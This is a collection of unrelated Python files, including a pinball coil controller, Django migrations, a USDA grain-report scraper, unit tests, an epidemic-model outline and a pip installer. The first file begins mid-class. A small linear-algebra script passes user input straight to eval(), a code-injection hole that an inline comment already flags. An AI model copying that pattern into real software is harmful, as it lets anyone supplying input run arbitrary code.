        self.GPB1_L_BVN9_S3_GELE_TARGET_RECHTS_MIDDEN = GPB1_L_BVN9_S3_GELE_TARGET_RECHTS_MIDDEN
        self.GPA7_L_OND10_S20_GELE_TARGET_LINKS_BENEDEN = GPA7_L_OND10_S20_GELE_TARGET_LINKS_BENEDEN
        self.GPA6_L_OND9_S18_GELE_TARGET_LINKS_MIDDEN = GPA6_L_OND9_S18_GELE_TARGET_LINKS_MIDDEN
        self.GPB2_L_BVN8_S7_GELE_TARGET_RECHTS_BOVEN = GPB2_L_BVN8_S7_GELE_TARGET_RECHTS_BOVEN
        self.GPA5_L_OND8_S14_GELE_TARGET_LINKS_BOVEN = GPA5_L_OND8_S14_GELE_TARGET_LINKS_BOVEN
        self.GPB5_R_BVN3_S101_RODE_KNOP_SCROBMODE = GPB5_R_BVN3_S101_RODE_KNOP_SCROBMODE
    def update(self, deltaTime):
        """Advance the coil state machine by *deltaTime* seconds.

        Energises/releases the coil pins depending on the red scrub-mode
        button and the yellow target switches.  Always returns 0.
        """
        if self.inTransition == 0:
            # Translated from Dutch: "rhea adjusted this and the following
            # elif, because no rechtsBovenSwitch and rechtsBenedenSwitch
            # existed."
            # Button released + a top target made: start the full
            # three-step sequence with both coil pins energised.
            if self.GPB5_R_BVN3_S101_RODE_KNOP_SCROBMODE.getState() == 0 and (self.GPB2_L_BVN8_S7_GELE_TARGET_RECHTS_BOVEN.getState() == 1 or self.GPA5_L_OND8_S14_GELE_TARGET_LINKS_BOVEN.getState() == 1):
                self.timeEnabled = 0
                self.transitionState = 2
                self.inTransition = 1
                GPIO.output(self.coilPinOne, self.HIGH)
                GPIO.output(self.coilPinTwo, self.HIGH)
            # Button held + a middle target made: single pulse on pin one.
            elif self.GPB5_R_BVN3_S101_RODE_KNOP_SCROBMODE.getState() == 1 and (self.GPA6_L_OND9_S18_GELE_TARGET_LINKS_MIDDEN.getState() == 1 or self.GPB1_L_BVN9_S3_GELE_TARGET_RECHTS_MIDDEN.getState() == 1):
                self.timeEnabled = 0
                GPIO.output(self.coilPinOne, self.HIGH)
                self.inTransition = 2
            # Button held + a bottom target made: single pulse on pin one.
            elif self.GPB5_R_BVN3_S101_RODE_KNOP_SCROBMODE.getState() == 1 and (self.GPA7_L_OND10_S20_GELE_TARGET_LINKS_BENEDEN.getState() == 1 or self.GPB0_L_BVN10_S1_GELE_TARGET_RECHTS_BENEDEN.getState() == 1):
                self.timeEnabled = 0
                GPIO.output(self.coilPinOne, self.HIGH)
                self.inTransition = 2
        elif self.inTransition == 1:
            # Three-step timed sequence; each step lasts maxTimeEnabled.
            self.timeEnabled += deltaTime
            if self.transitionState == 1:
                #print "state 1 --" + str(self.timeEnabled)
                if self.timeEnabled>self.maxTimeEnabled:
                    self.transitionState = 2
                    GPIO.output(self.coilPinTwo, self.HIGH)
                    self.timeEnabled = 0
            elif self.transitionState == 2:
                #print "state 2"
                if self.timeEnabled>self.maxTimeEnabled:
                    self.transitionState = 3
                    GPIO.output(self.coilPinOne, self.LOW)
                    self.timeEnabled = 0
            elif self.transitionState == 3:
                #print "state 3"
                if self.timeEnabled>self.maxTimeEnabled:
                    self.transitionState = 0
                    GPIO.output(self.coilPinTwo, self.LOW)
                    self.timeEnabled = 0
                    self.inTransition = 0
        elif self.inTransition == 2:
            # Single pulse: release pin one after maxTimeEnabled seconds.
            self.timeEnabled += deltaTime
            if self.timeEnabled>self.maxTimeEnabled:
                self.timeEnabled = 0
                GPIO.output(self.coilPinOne, self.LOW)
                self.inTransition = 0
        return 0
    def disable(self):
        """Release the coil; pulse pin one while the red button stays held."""
        self.enabled = False
        GPIO.output(self.coilPinTwo, self.LOW)
        while self.GPB5_R_BVN3_S101_RODE_KNOP_SCROBMODE.getState() == 1:
            GPIO.output(self.coilPinOne, self.HIGH) # translated from Dutch: "safe to do this?"
            GPIO.output(self.coilPinOne, self.LOW)
    def __str__(self):
        """Report whether the red scrub-mode button currently reads active."""
        return "coil enabled: %s" % (self.GPB5_R_BVN3_S101_RODE_KNOP_SCROBMODE.getState())
|
# Demo of multiple specific except clauses around user-driven division.
a = input('Enter value for a')
b = input('Enter value for b')
try:
    a = int(a)
    b = int(b)
    result = a / b
    print(result)
    print(name)  # 'name' is never defined -- deliberately raises NameError
except ValueError:
    # Raised by int() when the input is not a valid integer literal.
    print('Give valid input!')
except NameError:
    # Raised by print(name) above.
    print('undefined variable is called')
except ZeroDivisionError:
    print('Cannot divide a number by 0')
|
# Generated by Django 3.1.7 on 2021-03-16 14:57
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated: drops the Contact_Email and Name fields from Profile.
    # NOTE(review): generated migrations should not be hand-edited.
    dependencies = [
        ('bitsapp', '0004_profile'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='profile',
            name='Contact_Email',
        ),
        migrations.RemoveField(
            model_name='profile',
            name='Name',
        ),
    ]
|
#!/usr/bin/env python
from popex.popex_objects import Problem, CatParam
from popex import algorithm
import geostat
import forward
def main():
    """Run the PoPEx inversion: DeeSse prior sampling + MODFLOW forward solves."""
    deesse_simulator = geostat.DeesseSimulator()
    flow_solver = forward.FlowSolver(path_results = 'modflow')
    problem = Problem(generate_m=deesse_simulator.generate_m, # model generation function
                      compute_log_p_lik=flow_solver.compute_log_p_lik, # log likelihood (forward)
                      get_hd_pri=deesse_simulator.get_hd_pri) # prior hard conditioning
    # Multiprocessing run: 40 workers, up to 1000 models, 1000 prior samples.
    algorithm.run_popex_mp(pb=problem,
                           path_res='popex',
                           path_q_cat=None,
                           nmp=40,
                           nmax=1000,
                           ncmax=(10,),
                           n_prior=1000)
if __name__=='__main__':
    main()
|
# -*- coding:utf8 -*-
import unittest
from radikowave.api import RadikoApi, RadikoArea, RadikoStation
__author__ = 'attakei'
class AreaTest(unittest.TestCase):
    """RadikoArea exposes its JP area id via both a method and a property."""

    def test_get_id(self):
        self.assertEqual('JP1', RadikoArea.Hokkaido.get_id())
        self.assertEqual('JP47', RadikoArea.Okinawa.get_id())

    def test_as_property(self):
        self.assertEqual('JP1', RadikoArea.Hokkaido.area_id)
class StationTest(unittest.TestCase):
def test_from_dom(self):
dom_base = """<station>
<id>HBC</id>
<name>HBCラジオ</name>
<ascii_name>HBC RADIO</ascii_name>
<href>http://www.hbc.co.jp/radio/index.html</href>
<logo_xsmall>http://radiko.jp/station/logo/HBC/logo_xsmall.png</logo_xsmall>
<logo_small>http://radiko.jp/station/logo/HBC/logo_small.png</logo_small>
<logo_medium>http://radiko.jp/station/logo/HBC/logo_medium.png</logo_medium>
<logo_large>http://radiko.jp/station/logo/HBC/logo_large.png</logo_large>
<logo width="124" height="40">http://radiko.jp/v2/static/station/logo/HBC/124x40.png</logo>
<logo width="344" height="80">http://radiko.jp/v2/static/station/logo/HBC/344x80.png</logo>
<logo width="688" height="160">http://radiko.jp/v2/static/station/logo/HBC/688x160.png</logo>
<logo width="172" height="40">http://radiko.jp/v2/static/station/logo/HBC/172x40.png</logo>
<logo width="224" height="100">http://radiko.jp/v2/static/station/logo/HBC/224x100.png</logo>
<logo width="448" height="200">http://radiko.jp/v2/static/station/logo/HBC/448x200.png</logo>
<logo width="112" height="50">http://radiko.jp/v2/static/station/logo/HBC/112x50.png</logo>
<logo width="168" height="75">http://radiko.jp/v2/static/station/logo/HBC/168x75.png</logo>
<logo width="258" height="60">http://radiko.jp/v2/static/station/logo/HBC/258x60.png</logo>
<feed>http://radiko.jp/station/feed/HBC.xml</feed>
<banner>http://radiko.jp/res/banner/HBC/20110922161828.png</banner>
</station>"""
import xml.etree.ElementTree as ET
stations_root = ET.fromstring(dom_base)
station = RadikoStation.from_dom(stations_root)
self.assertIsInstance(station, RadikoStation)
self.assertEqual(station.id, 'HBC')
self.assertEqual(station.name, 'HBCラジオ')
class ApiTest(unittest.TestCase):
    """Behaviour of RadikoApi construction and station fetching."""

    def test_init_default_area(self):
        # The default area is Tokyo.
        api = RadikoApi()
        self.assertEqual(api.area, RadikoArea.Tokyo)

    def test_init_specify_area(self):
        api = RadikoApi(RadikoArea.Chiba)
        self.assertEqual(api.area, RadikoArea.Chiba)

    def test_fetch_stations(self):
        # Renamed from 'test_featch_stations' (typo fix; still discovered
        # by unittest's test_* prefix).
        # NOTE(review): this hits the live radiko.jp service and assumes
        # Hokkaido currently lists exactly 7 stations -- brittle.
        api = RadikoApi(RadikoArea.Hokkaido)
        stations = api.fetch_stations()
        self.assertIsInstance(stations, list)
        self.assertEqual(len(stations), 7)
        for station in stations:
            self.assertIsInstance(station, RadikoStation)
|
# Generated by Django 3.2.9 on 2021-11-03 13:40
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated: adds a required 'name' field to MaterialFile; the
    # literal 'name' default is a one-off backfill for existing rows
    # (preserve_default=False removes it afterwards).
    dependencies = [
        ('materials', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='materialfile',
            name='name',
            field=models.CharField(default='name', help_text='Name associated with the file.', max_length=100),
            preserve_default=False,
        ),
    ]
|
# -*- coding: utf-8 -*-
import abc
from ..._vendored import six
from .rules import _UpdateRule
@six.add_metaclass(abc.ABCMeta)
class _UpdateStrategy(object):
    """Abstract base class for endpoint update strategies.

    Subclasses set ``_STRATEGY`` to the identifier sent to the backend
    and implement ``_as_build_update_req_body()``.
    """
    # Backend identifier for the strategy; overridden by each subclass.
    _STRATEGY = ""
    @abc.abstractmethod
    def _as_build_update_req_body(self):
        """
        Returns
        -------
        dict
            JSON to be passed as the body for an Endpoint update request.
        """
        pass
class DirectUpdateStrategy(_UpdateStrategy):
    """A direct endpoint update strategy.
    The JSON equivalent for this is:
    .. code-block:: json
        {
            "strategy": "direct"
        }
    Represents direct update strategy for Endpoint.
    Examples
    --------
    .. code-block:: python
        from verta.endpoint.update import DirectUpdateStrategy
        strategy = DirectUpdateStrategy()
    """
    # NOTE(review): the docstring's JSON example shows "direct" but the
    # value actually sent is "rollout" -- confirm the backend contract
    # before changing either side.
    _STRATEGY = "rollout"
    def _as_build_update_req_body(self):
        # A direct update needs no configuration beyond the strategy name.
        return {
            "strategy": self._STRATEGY,
        }
class CanaryUpdateStrategy(_UpdateStrategy):
    """A rule-based canary endpoint update strategy.

    The JSON equivalent for this is:

    .. code-block:: json

        {
            "strategy": "canary",
            "canary_strategy": {
                "progress_step": 0.2,
                "progress_interval_seconds": 10,
                "rules": []
            }
        }

    Parameters
    ----------
    interval : int
        Rollout interval, in seconds.
    step : float in (0, 1]
        Ratio of deployment to roll out per `interval`.

    Examples
    --------
    .. code-block:: python

        from verta.endpoint.update import CanaryUpdateStrategy
        strategy = CanaryUpdateStrategy(interval=10, step=.1)

    """
    _STRATEGY = "canary"

    def __init__(self, interval, step):
        # `interval` must be a positive int.
        interval_err_msg = "`interval` must be int greater than 0"
        if not isinstance(interval, int):
            raise TypeError(interval_err_msg)
        if not interval > 0:
            raise ValueError(interval_err_msg)
        # `step` must be a float in the half-open range (0, 1].
        step_err_msg = "`step` must be float in (0, 1]"
        if not isinstance(step, float):
            raise TypeError(step_err_msg)
        if not 0 < step <= 1:
            raise ValueError(step_err_msg)
        self._progress_interval_seconds = interval
        self._progress_step = step
        self._rules = []

    def _as_build_update_req_body(self):
        # A canary rollout is meaningless without at least one rule.
        if not self._rules:
            raise RuntimeError("canary update strategy must have at least one rule")
        canary_config = {
            "progress_interval_seconds": self._progress_interval_seconds,
            "progress_step": self._progress_step,
            "rules": [rule._as_dict() for rule in self._rules],
        }
        return {"strategy": self._STRATEGY, "canary_strategy": canary_config}

    def add_rule(self, rule):
        """Append *rule* (an `_UpdateRule`) to this strategy."""
        if not isinstance(rule, _UpdateRule):
            raise TypeError(
                "strategy must be an object from verta.endpoint.update_rules"
            )
        self._rules.append(rule)
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 04 10:13:02 2014
@author: nataliecmoore
Script Name: USDA_GX_GR110_SCRAPER
Purpose:
Retrieve daily USDA data from the GX_GR110 report via the USDA LMR
web service for upload to Quandl.com. The script pulls data for
the minimum and maximum bids for the past 15 days and past 15-30 days for
soybeans, corn, and srw wheat.
Approach:
Used python string parsing to extract the minimum and maximum bids and
then format in a table for upload to Quandl.com
Author: Natalie Moore
History:
Date Author Purpose
----- ------- -----------
06/03/2014 Natalie Moore Initial development/release
"""
import urllib2
import pytz
import pandas as pd
import datetime
import sys
import re
# NOTE: this is a Python 2 script (urllib2, print statements).
date=datetime.datetime.now(pytz.timezone('US/Eastern')).strftime('%Y-%m-%d') # holds the date in YYYY-MM-DD format
# stores report in variable 'site_contents'
url='http://www.ams.usda.gov/mnreports/gx_gr110.txt'
site_contents=urllib2.urlopen(url).read()
# Stores the names of the crops for the past 15 days in labels_15 and the names
# of the crops formatted to be used in the name of the quandl file in labels_15_names
labels_15=['Soybeans', 'Corn', 'Corn']
labels_15_names=['Soybeans', 'Corn (Terminal Elevator)', 'Corn (Processor)']
# Stores the names of the crops for the past 15-30 days in labels_30 and the names
# of the crops formatted to be used in the name of the quandl file in labels_30_names
labels_30=['SRW Wheat', 'Soybeans', 'Corn', 'Corn']
labels_30_names=['SRW Wheat', 'Soybeans', 'Corn (Terminal Elevator)', 'Corn (Processor)']
# This function takes in an index of a hyphen and returns the minimum and maximum bids
# Precondition: index is a valid index for a hyphen that separates two numerical values
def min_and_max(index):
    """Return [minimum_bid, maximum_bid] around the hyphen at `index` in site_contents.

    The bid range appears as "<min>-<max>" bounded by spaces; this slices the
    text between the surrounding spaces on each side of the hyphen.
    Precondition: `index` is a valid index of a hyphen separating two
    numerical values in the global `site_contents`.

    BUGFIX: the original body ignored its `index` parameter and read the
    global `hyphen` instead; callers pass `hyphen` as the argument, so using
    the parameter preserves behavior while making the function self-contained.
    """
    space_before=site_contents.rfind(' ', 0, index)
    space_after=site_contents.find(' ', index)
    minimum_bid=site_contents[space_before:index].strip()
    maximum_bid=site_contents[index+1:space_after].strip()
    return [minimum_bid, maximum_bid]
ending_index=0 # used in the following loop for indexing, initialized to 0
# Loops through each crop in labels_15. Finds the minimum and maximum bids
# and formats for upload to quandl (quandl metadata + CSV printed to stdout).
x=0
while x<len(labels_15):
    ending_index=site_contents.find('Spot', ending_index+1) # bids occur before the word "Spot"
    starting_index=site_contents.rfind(labels_15[x], 0, ending_index) # index of the crop name
    hyphen=site_contents.find('-', starting_index) # index of the hyphen that separates the bids
    bids=min_and_max(hyphen) # calls min_and_max and stores the minimum and maximum bids in list "bids"
    bids=[float(y) for y in bids] # changes bid values to floats
    headings=[ 'Date', 'Minimum Bid', 'Maximum Bid']
    data={'Date': [date], 'Minimum Bid': [bids[0]], 'Maximum Bid': [bids[1]]}
    data_df=pd.DataFrame(data, columns=headings)
    data_df.index=data_df['Date']
    data_df=data_df.drop('Date', 1)
    replace = re.compile('[ /]') # characters to be replaced with '_' in the dataset name
    remove = re.compile('[,%#-&()!$+<>?/\'"{}.*@]') # characters to be removed from the dataset name
    name1 = replace.sub('_', labels_15_names[x].upper()) # replace certain characters with '_'
    name2 = remove.sub('', name1).upper() # remove certain characters and convert to upper case
    name2 = name2.translate(None, '-') # ensure '-' character is removed
    quandl_code='USDA_GX_GR110_'+name2+'_SPOT\r'
    reference_text = ' Historical figures from USDA can be verified using the LMR datamart located ' \
                     '\n at http://mpr.datamart.ams.usda.gov.\n'
    print 'code: ' + quandl_code+'\n'
    print 'name: Chicago Terminal Grain Report- Minimum and Maximum Bids (past 15 days)- '+labels_15_names[x]+'\n'
    print 'description: Minimum and maximum bids up to the past 15 days for '+labels_15_names[x]+ \
            ' from the USDA GX_GR110 report published by the USDA Agricultural Marketing Service ' \
            '(AMS). Prices represent $/bu. \n'\
            + reference_text+'\n'
    print 'reference_url: http://www.ams.usda.gov/mnreports/gx_gr110.txt\n'
    print 'frequency: daily\n'
    print 'private: false\n'
    print '---\n'
    data_df.to_csv(sys.stdout)
    print '\n'
    print '\n'
    x=x+1
ending_index=0 # initializes ending_index to 0
# Loops through each crop in labels_30. Finds the minimum and maximum bids
# and formats for upload to quandl (same shape as the 15-day loop above).
x=0
while x<len(labels_30):
    ending_index=site_contents.find('30 Days', ending_index+1) # bids occur before the string "30 Days"
    starting_index=site_contents.rfind(labels_30[x],0, ending_index) # index of the crop name
    hyphen=site_contents.find('-', starting_index) # index of the hyphen that separates the bid values
    bids=min_and_max(hyphen)
    bids=[float(y) for y in bids]
    headings=[ 'Date', 'Minimum Bid', 'Maximum Bid']
    data={'Date': [date], 'Minimum Bid': [bids[0]], 'Maximum Bid': [bids[1]]}
    data_df=pd.DataFrame(data, columns=headings)
    data_df.index=data_df['Date']
    data_df=data_df.drop('Date', 1)
    replace = re.compile('[ /]') # characters to be replaced with '_' in the dataset name
    remove = re.compile('[,%#-&()!$+<>?/\'"{}.*@]') # characters to be removed from the dataset name
    name1 = replace.sub('_', labels_30_names[x].upper()) # replace certain characters with '_'
    name2 = remove.sub('', name1).upper() # remove certain characters and convert to upper case
    name2 = name2.translate(None, '-') # ensure '-' character is removed
    quandl_code='USDA_GX_GR110_'+name2+'_30_DAY\r'
    reference_text = ' Historical figures from USDA can be verified using the LMR datamart located ' \
                     '\n at http://mpr.datamart.ams.usda.gov.\n'
    print 'code: ' + quandl_code+'\n'
    print 'name: Chicago Terminal Grain Report- Minimum and Maximum Bids (Past 15-30 days)- '+labels_30_names[x]+'\n'
    print 'description: Minimum and maximum bids for the past 15-30 days for '+labels_30_names[x]+ \
            ' from the USDA GX_GR110 report published by the USDA Agricultural Marketing Service ' \
            '(AMS). Prices represent $/bu. \n'\
            + reference_text+'\n'
    print 'reference_url: http://www.ams.usda.gov/mnreports/gx_gr110.txt\n'
    print 'frequency: daily\n'
    print 'private: false\n'
    print '---\n'
    data_df.to_csv(sys.stdout)
    print '\n'
    print '\n'
    x=x+1
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
from os.path import join
import numpy as np
from collections import deque
import matplotlib.pyplot as plt
from gym.spaces.box import Box
class Env(object):
    """Base environment wrapper with frame-stacking and POMDP masking options.

    Concrete subclasses must implement render/visual/reset/step/state_shape
    and are expected to expose a gym environment as ``self.env`` (used by
    ``action_dim``).
    """
    def __init__(self, **kwargs):
        self.logger = kwargs.get('logger', logging.getLogger(__name__))
        self.idx = kwargs.get('env_idx', 0) # NOTE: for creating multiple environment instances
        # general setup
        self.mode = kwargs.get('mode', 0) # NOTE: save frames when mode=1
        if self.mode == 1:
            # Prefer scipy.misc.imsave; fall back to matplotlib when unavailable.
            try:
                import scipy.misc
                self.imsave = scipy.misc.imsave
            except ImportError:
                self.logger.warning("WARNING: scipy.misc not found, use plt.imsave")
                self.imsave = plt.imsave
            self.img_dir = join(kwargs.get('root_dir', '~'), "imgs")
            self.logger.info("Frames will be saved to: " + self.img_dir)
            self.frame_idx = 0
        self.seed = kwargs.get('seed', 2020) + self.idx # NOTE: so to give a different seed to each instance
        self.stack_len = kwargs.get('stack_len', 4)  # number of frames stacked per observation
        self.solved_criteria = kwargs.get('solved_criteria', 100) # score
        self.q_threhold = kwargs.get('q_threhold', 100) # threshold to justify whether soft-divergence has occured
        self.episode_ended = False
        # POMDP setup
        self.pomdp = kwargs.get('pomdp', False)
        self.pomdp_type = kwargs.get('pomdp_type', 'flickering')
        self.pomdp_mask = np.array(kwargs.get('pomdp_mask', []))
        self.pomdp_prob = kwargs.get('pomdp_prob', 0.5)
        self._reset_experience()
    def _reset_experience(self):
        """Clear the last transition and both frame-stack deques."""
        self.exp_action = None
        self.exp_reward = None
        self.exp_terminal1 = None
        self.seq_state0 = deque(maxlen=self.stack_len)
        self.seq_state1 = deque(maxlen=self.stack_len)
    def _preprocessStates(self, states): # NOTE: padding zeros state if size is less than stack_len
        # Returns an array of shape (stack_len, *state_shape); missing leading
        # frames are zero-padded so early-episode stacks keep a fixed shape.
        if not states:
            return np.zeros([self.stack_len, *self.state_shape])
        states = np.array(states)
        if states.shape[0] < self.stack_len:
            states = np.append(np.zeros([self.stack_len - states.shape[0], *self.state_shape]), states, axis=0)
        return states
    def _get_experience(self):
        """Return (state0, action, reward, state1, not_done) for the last transition."""
        return (self._preprocessStates(self.seq_state0), self.exp_action, self.exp_reward, self._preprocessStates(self.seq_state1), float(not self.exp_terminal1))
    def render(self): # render using the original gl window
        raise NotImplementedError()
    def visual(self): # visualize onto visdom
        raise NotImplementedError()
    def reset(self):
        raise NotImplementedError()
    def step(self, action):
        raise NotImplementedError()
    @property
    def state_shape(self):
        raise NotImplementedError()
    @property
    def action_dim(self): # for now assuming discrete control
        # Box -> continuous action dimension; otherwise discrete action count.
        if isinstance(self.env.action_space, Box):
            return self.env.action_space.shape[0]
        else:
            return self.env.action_space.n
|
from numpy import*
from numpy.linalg import*
# Solve the 3x3 linear system mat @ q = v for the gem counts, then report
# each rounded count and which gem is most numerous (ties favor earlier gems).
# SECURITY NOTE(review): eval(input(...)) executes arbitrary user input —
# consider parsing the numbers explicitly instead of eval.
mat=array([[8,3,1],[5,12,10],[1,3,2]])
v=array(eval(input("digite: ")))
v=v.T  # transposing a 1-D array is a no-op (and .T is applied again below)
q=dot(inv(mat),v.T)
print("ametista:",round(q[0],0))
print("esmeralda:",round(q[1],0))
print("safira:",round(q[2],0))
if(q[0]==max(q)):
    print("ametista")
elif(q[1]==max(q)):
    print("esmeralda")
else:
    print("safira")
|
from ._ReportDynamicInfo import *
from ._Reset import *
from ._SetSpeedForPositionMovesPan import *
from ._SetAbsolutePositionPan import *
from ._SetAbsolutePositionTilt import *
from ._SetRelativePosition import *
from ._ReportStaticInfo import *
from ._SetAbsolutePosition import *
from ._HaltMotion import *
from ._SetSpeedForPositionMovesTilt import *
from ._SetVelocityTilt import *
from ._StartPositionControl import *
from ._SetVelocityPan import *
from ._StartVelocityControl import *
|
import sys
def getList(filename):
    """Parse `filename` into a list of (key, value) string pairs.

    Lines are expected to look like "key: value"; all spaces and the
    trailing newline are stripped before splitting on ':'.
    """
    pairs = []
    with open(filename, 'r') as handle:
        for raw in handle:
            cleaned = raw.replace(' ', '').replace('\n', '')
            fields = cleaned.split(':')
            pairs.append((fields[0], fields[1]))
    return pairs
def Sort2cmp(r):
    """Canonically order (name, count) pairs: count descending, name ascending.

    Two stable sorts: secondary key (name) first, then primary key
    (numeric count, descending) — ties on count keep the name order.
    """
    by_name = sorted(r, key=lambda pair: pair[0])
    return sorted(by_name, key=lambda pair: int(pair[1]), reverse=True)
# Compare two "name: count" files ignoring line order: parse both, sort each
# into canonical order, then test for equality.
f1 = sys.argv[1]
f2 = sys.argv[2]
r1 = getList(f1)
r2 = getList(f2)
r1 = Sort2cmp(r1)
r2 = Sort2cmp(r2)
if r1 == r2:
    print("True")
else:
    print("False")
|
## Author: Anne Ewing
## Date: 06/25/15
## Function: Outline for project population and disease model
### packages/modules ###
import csv
import sys
import networkx as nx
import numpy as np
### local modules ###
sys.path.append('/home/anne/Dropbox/Anne_Bansal_Lab')
### functions ###
import functions_chain_binomial_sim_pop_disease_model_v062515 as func
#import chain_binomial as sbfunc
# NOTE: Python 2 script (bare print statements); relies on the local module
# imported as `func` for all data-loading helpers.
## POPULATION ##
# 1
## pop of metropolitan areas and pop sizes (US)
## format: 2 columns (met_id, pop_size)
#metropop = csv.reader(open('/home/anne/Dropbox/Anne_Bansal_lab/SDI_Data/_______.csv', 'r'),delimiter = ',')
#
#d_pop_for_metro = func.import_metropop(metropop, 0, 1)
# 2
## connectivity btwn metro areas & # of travelers btwn them (US)
## format: edgelist - (met_id1, met_id2, # travelers)
# ex: G = networkx.read_edgelist()
metro_edges_travelers = 'Dropbox/Anne_Bansal_lab/Python_Scripts/Modeling_Project/air_traffic_data/air_traffic_edgelist.txt'
G = func.read_edgelist_anne(metro_edges_travelers)
print G.edges()
#contact_network = sbfunc.read_contact_network(metro_edges_travelers)
#metro_edges_travelers = csv.reader(open('/home/anne/Dropbox/Anne_Bansal_lab/Python_Scripts/Modeling_Project/air_traffic_data/air_traffic_edgelist.txt', 'rb'), delimiter='\t')
#metro_edges_travelers = open('/home/anne/Dropbox/Anne_Bansal_lab/Python_Scripts/Modeling_Project/air_traffic_data/air_traffic_edgelist.txt')
#
#
#for edge in metro_edges_travelers:
#    print edge
#
#metro_edges_travelers.close()
#
#G = nx.read_edgelist('/home/anne/Dropbox/Anne_Bansal_lab/Python_Scripts/Modeling_Project/air_traffic_data/air_traffic_edgelist.txt', delimiter='\t', data=True)
#G = nx.read_edgelist(metro_edges_travelers, data=True)
#print G.nodes()
#G = nx.read_edgelist(metro_edges_travelers, nodetype=int, data=True)
#G = nx.read_weighted_edgelist(metro_edges_travelers, delimiter=None, create_using=None, nodetype=None, encoding='utf-8')
#print G.edges()
# 3a
## w/in met area, split into children/adults
### use same fraction of child/adults for each metro area
### determine fraction from entire US, fraction children out of only children & adult
### fraction children = alpha (a) = (#ch)/(#ch + #ad)
#### alt option - (find dif fraction for each metro area)
## data ##
# AGE SPLIT #
# POLYMOD contact study (Ref 22 in Apollini 2013)
## Children: (5 - 19) ?
## Adults: (20 - 59) ?
#popdata
#totalpop_age.csv
# import csv file of pop data
popdata = csv.reader(open('/home/anne/Dropbox/Anne_Bansal_lab/SDI_Data/totalpop_age.csv', 'r'),delimiter = ',')
zippopdata = csv.reader(open('/home/anne/Dropbox/Anne_Bansal_lab/SDI_Data/allpopstat_zip3_season_cl_nocodes.csv', 'r'),delimiter = ',')
# import data into dicts
d_pop_for_yr_age, ages, years = func.import_popdata(popdata, 0, 1, 2)
#group ages into children and adults
child = ['5-9 years', '10-14 years', '15-19 years']
adult = ['20-29 years', '30-39 years', '40-49 years', '50-59 years']
d_childpop, d_adultpop = func.pop_child_adult(d_pop_for_yr_age, years, child, adult)
#print d_childpop[2010]
#print d_adultpop[2010]
# set value of alpha from U.S. pop data
year = 2010 # decided to use pop from 2010 bc most recent
a = func.pop_child_frac(year, d_childpop, d_adultpop)
#print alpha # = 0.27 for 2010
#### calc alpha for each zip3 #####
# sensitivity analysis - look at variance across zip3s
season = 9
d_zip_popdata, zip_popdata = func.import_zip3_popdata(zippopdata, 0, 2, 3, 4)
#d_zip_popdata[(zip3, seas, age)] = pop
d_zip_alphas, alphas = func.zippop_child_frac(zip_popdata, season, d_zip_popdata)
#print len(alphas)
# Summary statistics of the per-zip3 child fractions (sensitivity check).
mean_alpha = np.mean(alphas)
std_alpha = np.std(alphas)
var_alpha = np.var(alphas)
#print var_alpha
#print std_alpha
#print mean_alpha
#print len(zip_popdata)
# 3b
## contact btwn children and adults
## 'C' = equation 3 in Apollini 2014
### alpha (a) = fraction of ch --> calc in 3a
### (n) = ratio of ad/ch avg # contacts
### (E) = avg fraction of contacts across age groups
#### --> from Euro data in Table 2 in Apollini 2013 + Ref 22
#Apollini 2013, Table 2, "Europe (average values)"
n = 0.79
E = 0.097
#q_1 = #see additional file of Apollini 2013
# Table 1 Mossong POLYMOD
# weighted avg for children and adults avg # of contacts
age = [5, 10, 15, 20, 30, 40, 50]
child = age[0:3]
adult = age[3:7]
contacts = [14.81, 18.22, 17.58, 13.57, 14.14, 13.83, 12.30]
participants = [661, 713, 685, 879, 815, 908, 906]
d_mean_contacts = dict(zip(age, contacts))
d_num_part = dict(zip(age, participants))
avg_q_ch = func.weighted_avg_q(child, d_mean_contacts, d_num_part)
avg_q_ad = func.weighted_avg_q(adult, d_mean_contacts, d_num_part)
#print avg_q_ad
#print d_num_part
#Apollini 2014 Eq 3 - entries of the 2x2 child/adult contact matrix
C_cc = ((a - E) / (a **2))
C_ca = (E / (a * (1 - a)))
C_ac = (E / (a * (1 - a)))
C_aa = (((n * (1 - a)) - E) / ((1 - a) **2))
# matrix
C_matrix = np.matrix([[C_cc, C_ca], [C_ac, C_aa]])
#print C_matrix
C = (C_matrix * avg_q_ch)
#print C
############################
## DISEASE ##
## Infc_list = [patient_Zero]
## Susc_list = [everyone_else]
## for t (time steps) in (1, 100):
## S --> I ?
## for s in susc:
## infect nodes with prob (1-e^-B(# of infec contacts)) # infected degree = #infected contacts
## I --> R ?
## for i in infc:
## recover with prob u
## (u = 0.1 - infectious period is 10 days)
|
from django.contrib import admin
from loginapp.models import UserProfileInfo, User
# Register your models here.
# NOTE(review): `User` is imported above but never registered here — confirm
# whether that import is needed.
admin.site.register(UserProfileInfo)
|
import pip
import subprocess
import json
def install(name):
    """Install package `name` with pip3 and report the outcome.

    BUGFIX: the original caught ImportError, which subprocess.call never
    raises — pip failures (non-zero exit codes) and a missing pip3 binary
    (OSError) were both reported as success.  Judge success by the return
    code instead.
    """
    try:
        returncode = subprocess.call(['pip3', 'install', name])
    except OSError:
        # pip3 executable not found / not runnable
        print("Error in installing\n")
        print("Fail in installing ")
    else:
        if returncode == 0:
            print("Successfully \n")
        else:
            print("Error in installing\n")
            print("Fail in installing ")
# Example
# Example
if __name__ == '__main__':
    # Packages to install.  NOTE(review): the version values are never used —
    # install() pip-installs the latest release of each name, not the pinned
    # version listed here.
    Dependencies = {
        'beautifulsoup4' : '4.4.1',
        'boto' : '2.48.0',
        'bz2file' : '0.98',
        'certifi' : '2017.7.27.1',
        'chardet' : '3.0.4',
        'gensim' : '2.3.0',
        'html5lib' : '0.999',
        'idna' : '2.5',
        'nltk' : '3.2.4',
        'numpy' : '1.13.1',
        'pexpect' : '4.0.1',
        'pip' : '9.0.1',
        'ptyprocess' : '0.5',
        'pyxdg' : '0.25',
        'reportlab' : '3.3.0',
        'requests' : '2.18.3',
        'scipy' : '0.19.1',
        'setuptools' : '20.7.0',
        'six' : '1.10.0',
        'smart-open' : '1.5.3',
        'textblob' : '0.12.0',
        'twitter' : '1.17.1',
        'urllib3' : '1.22',
    }
    for Name in Dependencies:
        print ("installing "+Name+" library :- \n")
        install(Name)
#!/usr/bin/env python3
"""Downloads historic temperature data from Berkeley Earth"""
